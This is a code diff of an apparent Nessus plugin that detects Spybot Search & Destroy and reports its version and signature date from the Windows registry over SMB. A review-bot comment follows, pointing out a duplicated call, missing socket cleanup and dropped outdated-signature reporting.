-r = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (r != 1) {
-  if (log_verbosity > 1) debug_print("can't connect to the remote share (", r, ")!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+        close(soc);
+        exit(0);
+ }
 
-fh = CreateFile(
-  file:exe,
-  desired_access:GENERIC_READ,
-  file_attributes:FILE_ATTRIBUTE_NORMAL,
-  share_mode:FILE_SHARE_READ,
-  create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
-  if (log_verbosity > 1) debug_print("can't open ", exe, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+        close(soc);
+        exit(0);
+ }
 
-version = GetFileVersion(handle:fh);
-CloseFile(handle:fh);
-if (isnull(version))
-{
-  if (log_verbosity > 1) debug_print("can't get file version for ", exe, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
+ key_h = registry_get_key(soc:soc, uid:uid, tid:tid, pipe:pipe,
+                          key:key, reply:handle);
+ if(!key_h)
+ {
+ 	exit(0);
+ }
+ 
+ enumKeys = registry_enum_key(soc:soc, uid:uid, tid:tid,
+                              pipe:pipe, reply:key_h);
 
-ver = string(version[0], ".", version[1], ".", version[2], ".", version[3]);
-set_kb_item(name:"SMB/SpybotSD/version", value:ver);
+ foreach entry (enumKeys)
+ {
+    tmp = registry_get_sz(item:"DisplayName", key:key + entry);
 
+    if("Spybot" >< tmp) {
 
-# Get release date info about the detection rules (includes.zip)
-fh = CreateFile(
-  file:rules,
-  desired_access:GENERIC_READ,
-  file_attributes:FILE_ATTRIBUTE_NORMAL,
-  share_mode:FILE_SHARE_READ,
-  create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
-  if (log_verbosity > 1) debug_print("can't open ", rules, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
+       version = registry_get_sz(item:"DisplayVersion", key:key + entry);
+       if(!isnull(version)) {
+	 set_kb_item(name:"SMB/SpybotSD/version", value:version);
+       } 
 
-contents = ReadFile(handle:fh, offset:0, length:85);
-CloseFile(handle:fh);
-if (isnull(contents))
-{
-  if (log_verbosity > 1) debug_print("can't read ", rules, "!", level:0);
-  NetUseDel();
-  exit(0);
-}
-NetUseDel();
+       path = registry_get_sz(item:"InstallLocation", key:key + entry);
+       
+       if(path) {
+         path += "Updates";
+	 share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:path);
+	 path  = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:path);
+         file = path + "\downloaded.ini";
+       
+	 contents = read_file(file:file, share:share, offset:0, count:85);
 
-sigs_target = strstr(contents, "ReleaseDate=");
-if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
-if (isnull(sigs_target)) sigs_target = "n/a";
+	 if(contents && "ReleaseDate" >< contents) {
 
-if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
-  a = split(sigs_target, sep:"-", keep:0);
-  sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
-  sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
-} 
-else sigs_target_mmddyyyy = "n/a";
+	    sigs_target = strstr(contents, "ReleaseDate=");
+            if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
+	    if (isnull(sigs_target)) sigs_target = "n/a";
 
+	    if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
+	        a = split(sigs_target, sep:"-", keep:0);
+		sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
+		sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
+	    }
+	    else sigs_target_mmddyyyy = "n/a";
 
-sigs_vendor_yyyymmdd = "20080924";
-sigs_vendor_mmddyyyy = string(
-  substr(sigs_vendor_yyyymmdd, 4, 5),
-  "/",
-  substr(sigs_vendor_yyyymmdd, 6, 7),
-  "/",
-  substr(sigs_vendor_yyyymmdd, 0, 3)
-);
+            if(version && sigs_target_mmddyyyy) {
+            
+               report = string(
+                               desc,
+                               "\n\n",
+                               "Plugin output :\n\n",
+                               "Version    : ", version, "\n",
+                               "Signatures : ", sigs_target_mmddyyyy);
+          
+               if(report_verbosity > 0) {
+                  security_note(port:port, data:report);
+                  exit(0);
+               }
+           }
+	 }  
+       }
+     break;
+    }  
+ }
 
-# Generate report.
-report = string(
-  desc,
-  "\n\n",
-  "Plugin output :\n\n",
-  "  Version    : ", ver, "\n",
-  "  Signatures : ", sigs_target_mmddyyyy
-);
-
-if (sigs_target == "n/a")
-{
-    report = string(
-      report,
-      "\n\n",
-      "The remote host has never updated its Spybot S&D detection rule\n",
-      "signatures. The latest version is ", sigs_vendor_mmddyyyy, ". As a result, the\n",
-      "remote host might contain malware."
-    );
-    security_hole(port:kb_smb_transport(), data:report);
-}
-else if (sigs_target_yyyymmdd)
-{
-  if (int(sigs_target_yyyymmdd) < int(sigs_vendor_yyyymmdd))
-  {
-    report = string(
-      report,
-      "\n\n",
-      "The remote host has an out-dated version of the Spybot S&D\n",
-      "detection rule signatures; the most recent set is ", sigs_vendor_mmddyyyy, ".\n",
-      "As a result, the remote host might contain malware."
-    );
-    security_hole(port:kb_smb_transport(), data:report);
-  }	 
-  else security_note(port:kb_smb_transport(), data:report);
-}
+exit(0);
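Review bot: `registry_open_hklm()` is called twice back to back with identical arguments and the first handle is simply overwritten; the second block should go. The `if(!key_h)` branch exits without `close(soc)`, unlike every earlier failure path, and the socket is not closed before the final `exit(0)` either; `close(soc); exit(0);` in that branch and a `close(soc);` before the last line would make the cleanup consistent. The rewrite also drops the outdated-signature comparison that the old code reported with `security_hole()`, leaving `sigs_target_yyyymmdd` computed but unused. `if(version && sigs_target_mmddyyyy)` is effectively `if(version)`, because the second operand is always a date or `"n/a"` at that point.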


